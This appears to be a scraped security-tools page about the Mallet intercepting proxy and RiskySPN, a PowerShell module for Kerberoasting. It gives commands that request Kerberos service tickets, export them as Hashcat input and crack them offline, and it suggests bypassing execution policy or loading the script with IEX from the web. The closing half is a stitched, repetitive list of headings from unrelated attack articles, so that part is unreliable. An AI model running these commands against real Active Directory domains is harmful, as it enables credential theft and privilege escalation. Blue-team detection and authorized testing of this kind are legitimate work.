By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid re-implementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.

Also Read PacVim – A Game That Teaches You Vim Commands

Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.

Building Mallet

Mallet makes use of Maven, so compiling the code is a matter of

mvn package

To run it:

cd target/
java -jar mallet-1.0-SNAPSHOT-spring-boot.jar

There are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so they should be applicable to any app that sends JSON messages.

The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.

RiskySPN – Collection of PowerShell Scripts Focused on Detecting and Abusing SPNs Accounts

RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.

Also Read Metasploit Framework – A Beginner’s Guide for Penetration Testing, Exploit Development and Vulnerability Research

RiskySPN Usage

Install the module

Import-Module .\RiskySPNs.psm1

Or just load the script (you can also `IEX` from the web)

. .\Find-PotentiallyCrackableAccounts.ps1

Make sure Set-ExecutionPolicy is Unrestricted or Bypass

Get information about a function

Get-Help Get-TGSCipher -Full

All functions also have the -Verbosemode

Search vulnerable SPNs

Find vulnerable accounts

Find-PotentiallyCrackableAccounts

Sensitive + RC4 = $$$

Generate full detailed report about vulnerable accounts (CISO <3)

Export-PotentiallyCrackableAccounts

Get tickets

Request Kerberos TGS for SPN

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Or

Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

The fun stuff 🙂

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3

Installing DELTA

Running DELTA

Main Contributors

POWERSHELL ATTACK INSTRUCTIONS

MACRO ATTACK INSTRUCTIONS

HTA ATTACK INSTRUCTIONS

CERUTIL Attack Instruction

Custom PS1 Attack Instructions

DDE Office COM Attack Instructions

Import Cobalt Strike Beacon

Custom Shellcode Generation Method

How Onion nmap works:

Arguments:

Environment variables:

Notes:

WarBerryPi Usage

Installation

Reporting

Disclaimer

Features

Installation Instructions

Upgrading

Hawkeye Usage

Curate Initial set-up one-liner

Usage

List of search terms

Disclaimer

Options

Lab: Inject Backdoor into a Compromised Linux System

Options

Lab 1: Basics

Lab2: Dump Data to a local folder

Building Mallet

RiskySPN Usage

Install the module

Or just load the script (you can also IEX from the web)

Get information about a function

Search vulnerable SPNs

Find vulnerable accounts

Generate full detailed report about vulnerable accounts (CISO <3)

Get tickets

Request Kerberos TGS for SPN

Or

The fun stuff 🙂

Or just load the script (you can also `IEX` from the web)